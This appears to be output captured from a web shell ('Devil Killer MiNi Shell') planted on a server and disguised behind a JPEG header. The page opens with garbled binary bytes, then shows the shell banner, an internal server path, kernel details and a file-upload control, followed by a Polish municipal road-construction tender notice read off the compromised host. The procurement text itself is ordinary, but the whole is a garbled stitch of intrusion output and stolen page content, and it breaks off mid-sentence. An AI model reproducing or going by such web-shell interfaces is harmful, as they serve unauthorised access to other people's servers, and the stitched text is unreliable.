JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220811/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220811/0030191701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi wewnętrznej (ul. Sosnowa) w m. Rzeczyca </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIĘDZYRZEC PODLASKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 030237428</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">WARSZAWSKA 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Międzyrzec Podlaski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-560</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL811 - Bialski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(83) 371 24 96</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@miedzyrzecgmina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.ugmiedzyrzecpodlaski.e-bip.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi wewnętrznej (ul. Sosnowa) w m. Rzeczyca </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-26db8f91-17c6-11ed-acbd-46d0480cd9c4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00301917</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00027897/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa drogi wewnętrznej dz. nr ewid. 575/10 i 575/11 (ul. Sosnowa) w m. Rzeczyca z włączeniem do drogi powiatowej Nr P1127L</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.ugmiedzyrzecpodlaski.e-bip.eu <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: urzad@miedzyrzecgmina.pl <br/>Strona internetowa zamawiającego [URL]: https://miedzyrzecgmina.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Wykon. zamierzający wziąć udz. w post. o udz. zam. publ., musi posiadać konto na ePUAP. Wykon. posiadający konto na ePUAP ma dostęp do nast. formularzy: „Form. do złoż., zm., wycof. of. lub wn.” oraz do „Form. do komunik.”.<br/>2.	Wymag. techn. i organiz. wysył. i odbier. dok. elektr., elektr. kopii dok. i oświadczeń oraz inf. przekaz. przy ich użyciu opisane zostały w Regulaminie korzyst. z syst. miniPortal oraz War. korzyst. z elektr. platformy usług admin. publ. (ePUAP). Zas. skł. ofert oraz dok. skł. wraz z of. oraz Wymag. techn. i organiz. ich wysył. opisane w Instr. użytkownika. Wykon. zobowiązany jest zapoznać się z ww. Instr. i postęp. wg zasad w niej wskaz. Wykon. ubiegając się o udz. zam. w szczeg. skład ofertę akceptuje zasady korzyst. z systemu miniPortal wskazane w Instr. użytkown. i SWZ. W celu korzyst. z systemu miniPortal konieczne jest dysponow. przez użytkow. urządz. teleinformat. z dostępem do sieci Internet. Aplik. działa tylko na platf. Windows i wymaga .NET Framework 4.5. W przyp. korzyst. z urz. mobilnych oraz Mac lub Linux, dostęp do wszystkich funkcjonaln. systemu miniPortal może być ogranicz. Specyfik. połącz., formatu przesył danych oraz kodow. i oznacz. czasu odb. danych: specyfik. połącz. formul. udostęp. są za pomocą protok. TLS 1.2; format danych oraz kodow. miniPortal – Formul. dostępne są w formacie HTML z kodow. UTF-8; oznacz. czasu odbioru danych – miniPortal - wszelkie oper. opierają się o czas serwera i dane zapisyw. są z dokładn. co do setnej części sek.; integr. z syst. ePUAP jest wykon. w wykorzyst. standardow. mechanizmu ePUAP. W przypadku Wykon. wysyłającego wn. do Zam., ESP Zam. automat. generuje Rodzaj Urzędow. Poświadcz. Odb. t.j. Urzędowe Poświadcz. Przedłoż. (UPP), kt. jest powiąz. z wysył. dok. W UPP w sekcji „Dane poświadcz.” jest zawarta info. o dacie dor.<br/>System dostępny jest za pośredn. przeglądarek internet.: Microsoft Internet Explorer od wersji 9.0; Mozilla Firefox od wersji 15; Google Chrome od wersji 20.<br/>3.	Maksym. rozm. plików przesył. za pośredni. dedykow. formularzy: „Formularz złoż., zmiany, wycof. of. lub wn.” i „Formularza do komunik.” wynosi 150 MB. <br/>4.	Za datę przekaz. oferty, wniosków, zawiadom., dok. elektron., oświadczeń lub elektron. kopii dok. lub oświadczeń oraz innych info. przyjmuje się datę ich przekaz. na ePUAP.<br/>5.	Zam. przekaz. identyfikator postępow. na miniPortalu jako zał. Nr 5 do SWZ. Dane post. można wyszukać też na liście wszystkich postęp. w miniPortalu, klikając opcję„Dla Wykonawców”lub ze str. gł. z zakł. Postępowania.<br/>6.	Wyk. skł. ofertę za pośredn. „Formul. do złoż., zm., wycof. oferty lub wn.” dostępn. na ePUAP i udostępn. również na miniPortalu. Funkcjonaln. do zaszyfrow. of. przez Wyk. jest dostępna dla wykon. na miniPortalu, w szczeg. danego postępow. W formul. of. Wyk.. zobowiąz. jest podać adres skrz. ePUAP, na kt. prow. będzie korespond. zw. z post. <br/>7.	Of. należy sporz. w języku polskim.<br/>8. Of. skł. się, pod rygorem nieważności, w formie elektr. lub w postaci elektron. opatrz. podpisem zauf. lub podpisem osobistym. <br/>9.	Sposób złożenia oferty, w tym zaszyfrowania of. opisano w „Instrukcji użytkownika”, dost. na stronie: https://miniportal.uzp.gov.pl <br/>10.	Jeżeli dokum. elektr., przekazyw. przy użyciu śr. kom. elektr., zawierają info stanow. tajemn. przedsięb. wg ustawy z 16.04.1993 r. o zwalcz. nieuczciwej konkurencji, Wykon., w celu utrzym. w poufn. tych inf. przekazuje je w wydziel. i opow. oznacz. pliku z jednocz. zaznacz. „Zał. stanow. tajemnicę przedsięb.”, a nast. wraz z plikami stanow. jawną część należy ten plik zaszyfrować. <br/>11.	Do of. należy doł. oświadcz. o niepodleg. wykl., spełn. war. udz. w post., w zakr. wsk. w pkt 8.1.SWZ, w formie elektron. lub w postaci elektr. opatrz. podpisem zaufanym lub podpisem osobistym, a nast. zaszyfrować wraz z plikami stanow. ofertę.<br/>12.	Of. może być złożona tylko do upływu terminu skł. of. <br/>c.d. w SEKCJI: IX</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1)	Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;<br/>2)	dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w cel związanym z postępowaniem o udzielenie zamówienia publicznego <br/>na zadanie pn.: Przebudowa drogi wewnętrznej (ul. Sosnowa) w miejscowości Rzeczyca prowadzonym w trybie podstawowym;<br/>3)	odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 z późn. zm.), dalej „ustawa Pzp”; <br/>4)	dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność;<br/>5)	obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>6)	w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>7)	Wykonawca posiada:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>−	na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia <br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO;<br/>8)	Wykonawcy nie przysługuje:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO. <br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania <br/>o udzielenie zamówienia publicznego lub konkursu.<br/>W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KS.271.21.2022.AŁ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są roboty budowlane w ramach zadania inwestycyjnego pn.: „Przebudowa drogi wewnętrznej (ul. Sosnowa) w m. Rzeczyca”. Wykonanie robót obejmuje przebudowę drogi wewnętrznej dz. nr ewid. 575/10 i 575/11 (ul. Sosnowa) <br/>w m. Rzeczyca z włączeniem do drogi powiatowej Nr P1127L wraz z odcinkiem ulicy Przeciętka (dz. nr ewid. 586) od ulicy Sosnowej do połączenia z ulicą Leszczynową.<br/>2.	W ramach zakresu przedmiotu zamówienia należy w szczególności wykonać:<br/>- warstwę ścieralną z betonu asfaltowego AC 11S grub. 4 cm, dla KR 1-2;<br/>- warstwę wiążącą z betonu asfaltowego AC 16W grub. 5 cm, dla KR 1-2;<br/>- podbudowę zasadniczą z kruszywa łamanego grub. w-wy 15 cm;<br/>- warstwę odsączającą z piasku (pospółki), grub. w-wy 10 cm;<br/>- chodnik z kostki brukowej betonowej;<br/>- ustawienie krawężnika i opornika betonowego na ławie betonowej z oporem,<br/>- ustawienie studni chłonnych, <br/>- zjazdy do posesji z kostki brukowej betonowej;<br/>- ustawienie znaków pionowych;<br/>- zieleń. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach<br/>poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji jakości na wykonane roboty budowlane oraz dostarczone i wbudowane materiały</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu <br/>i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa w pkt. 8.1 SWZ składa z ofertą każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie te potwierdzają brak podstaw wykluczenia z postępowania w zakresie, w jakim każdy <br/>z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Oprócz przyp., o kt. mowa w art. 454 i 455 ustawy Pzp, strony dopuszczają możliwość wprowadz. zmiany umowy w stosunku do treści of., na podstawie kt. dokonano wyboru Wyk. w przypadku wystąpienia którejkolwiek z nast. okoliczności:<br/>1)	przedłuż. terminu realiz. zamów., o kt. mowa w § 2 ust. 1, może nastąpić w przyp. wystąp. okoliczn. siły wyższej, przez kt. należy rozumieć zdarzenia niezależne od żadnej ze str., zewn., niemożliwe do zapobież. kt. nastąpiło po dn. wejścia w życie umowy, w szczeg. wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i admin. publ., przy czym przedłuż. term. realiz. zam. nastąpi o liczbę dni, odpowiadającą okresowi występow. okoliczn. siły wyższej,<br/>2)	przedłuż. term. realiz. zam., o kt. mowa w § 2 ust. 1, może nastąpić w przyp. skierow. przez Zam. do Wyk. pisemn. żądania wstrzyma. robót budowl., stanow. przedm. zam. lub wydania zakazu prowadz. robót bud., stanow. przedm. zam. przez organ admin. publ. lub eksploatatorów infrastr., o ile żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za kt. Wyk. ponosi odpowiedz., przy czym przedłuż. term. realiz. zam. nastąpi o liczbę dni, odpowiad. okresowi na jaki Wyk. nakazano wstrzyma. robót budowl. lub zakazano prowadz. robót bud.,<br/>3)	przedłuż. term. realiz. zam., o kt. mowa w § 2 ust. 1, może nastąpić w przyp. wystąpienia kolizji z instalacjami wewn. nieujawnion.i w dok. proj., lub innymi robotami prowadz. przez innego wykon., przy czym przedłuż. term. realiz. zam. nastąpi o liczbę dni nieb. Wyk. na usunięcie kolizji z instalacjami wewn. nieujawnionymi w dok. proj. lub o liczbę dni niezbędnych do wykon. robót przez innego wykon. – o ile usunięcie kolizji wymagać będzie przedłuż. term. realiz.;<br/>4)	przedłuż. term. realiz. zam., o kt. mowa w § 2 ust. 1, może nastąpić w przyp. wystąp. konieczn. wprowadz. w dok. proj. zmian, powodujących wstrzyma. lub przerwanie robót bud., stanowiących przedm.zam., przy czym przedłuż. term. realiz. zam. nastąpi o liczbę dni niezbędną do wprowadz. zmian w dok. proj. oraz do przeprowadz. uzgodnień (ustaleń) z właściwymi organami, uzyskania opinii wł. organów oraz wydania dec. przez właściwe organy, przy czym wprowadz. w dok. proj. zmian nie może skutkować zwiększeniem (zmianą) zakresu świadczenia Wyk. zawartego w ofercie oraz zwiększeniem 